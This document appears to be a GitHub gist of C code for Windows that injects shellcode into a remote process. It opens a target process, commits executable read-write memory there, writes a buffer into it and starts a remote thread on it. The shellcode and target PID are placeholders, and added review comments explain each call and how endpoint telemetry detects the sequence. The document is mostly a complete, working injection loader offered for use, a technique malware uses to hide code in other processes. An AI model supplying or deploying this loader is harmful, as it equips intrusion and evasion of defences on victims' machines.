@0xntpower
Created December 23, 2023 12:21
Execute shellcode inside the memory space of a remote process
#include <stdio.h>
#include <Windows.h>
// File-scope byte array initialised from a string literal, so sizeof(buf)
// counts the terminating '\0' as well as the bytes that were pasted in.
unsigned char buf[] = "..."; // Paste your shellcode here
/*
 * Entry point.
 *
 * Opens the process identified by the hard-coded PID, commits a region of
 * PAGE_EXECUTE_READWRITE memory inside it, copies `buf` into that region,
 * starts a remote thread at the region's base address and blocks until that
 * thread exits.
 *
 * Returns 1 when OpenProcess, VirtualAllocEx, WriteProcessMemory or
 * CreateRemoteThread fails (the Win32 error code is printed first), 0
 * otherwise. argc/argv are not used.
 *
 * NOTE(review): this is the textbook cross-process injection sequence
 * (OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread).
 * From a defender's viewpoint every step here is an observable event: a
 * handle to another process opened with PROCESS_VM_WRITE | PROCESS_VM_OPERATION,
 * an RWX allocation in that process, a memory write into it, and a thread whose
 * start address is a heap-style allocation rather than a mapped image. Endpoint
 * telemetry that keys on that combination is the usual detection point.
 */
int main(int argc, char** argv)
{
// Get the process ID of the target process
// 00000 is an octal literal and evaluates to 0. It is a placeholder: OpenProcess
// is expected to fail for this value, taking the first error path below.
DWORD targetProcessId = 00000;
// Open the target process
// The four access rights are exactly those the later calls require:
// PROCESS_VM_OPERATION + PROCESS_VM_WRITE for VirtualAllocEx/WriteProcessMemory,
// PROCESS_CREATE_THREAD + PROCESS_QUERY_INFORMATION for CreateRemoteThread.
// FALSE: the handle is not inheritable by child processes.
HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD |
PROCESS_QUERY_INFORMATION |
PROCESS_VM_OPERATION |
PROCESS_VM_WRITE, FALSE, targetProcessId);
if (hProcess == NULL)
{
printf("OpenProcess failed, error %lu\n", GetLastError());
return 1;
}
// Allocate memory for shellcode in the target process
// Address hint 0 lets the system choose the base. sizeof(buf) includes the
// string literal's trailing '\0', so one byte more than the payload is
// committed. The page is writable and executable at the same time (RWX).
LPVOID remoteShellcode = VirtualAllocEx(hProcess, 0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (remoteShellcode == NULL)
{
printf("VirtualAllocEx failed, error %lu\n", GetLastError());
CloseHandle(hProcess);
return 1;
}
// Write the shellcode to the allocated memory in the target process
// Last argument NULL: the number of bytes actually written is not retrieved;
// only the BOOL return value decides success.
if (!WriteProcessMemory(hProcess, remoteShellcode, buf, sizeof(buf), NULL))
{
printf("WriteProcessMemory failed, error %lu\n", GetLastError());
// Release the region already committed above before bailing out.
VirtualFreeEx(hProcess, remoteShellcode, 0, MEM_RELEASE);
CloseHandle(hProcess);
return 1;
}
// Create a remote thread in the target process to execute the shellcode
// Default security attributes and stack size, start routine = base of the
// allocation, no thread parameter, no creation flags; the new thread's ID is
// not retrieved (last argument NULL).
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)remoteShellcode, NULL, 0, NULL);
if (hThread == NULL)
{
printf("CreateRemoteThread failed, error %lu\n", GetLastError());
VirtualFreeEx(hProcess, remoteShellcode, 0, MEM_RELEASE);
CloseHandle(hProcess);
return 1;
}
// Wait for the remote thread to finish
// The return value of WaitForSingleObject is ignored, so the success message
// below is printed regardless of why the wait returned.
WaitForSingleObject(hThread, INFINITE);
printf("Shellcode has been executed in the remote process!\n");
// Clean up
// Thread handle first, then the remote region (freed only after the thread has
// exited), then the process handle. Return values of the cleanup calls are not
// checked.
CloseHandle(hThread);
VirtualFreeEx(hProcess, remoteShellcode, 0, MEM_RELEASE);
CloseHandle(hProcess);
return 0;
}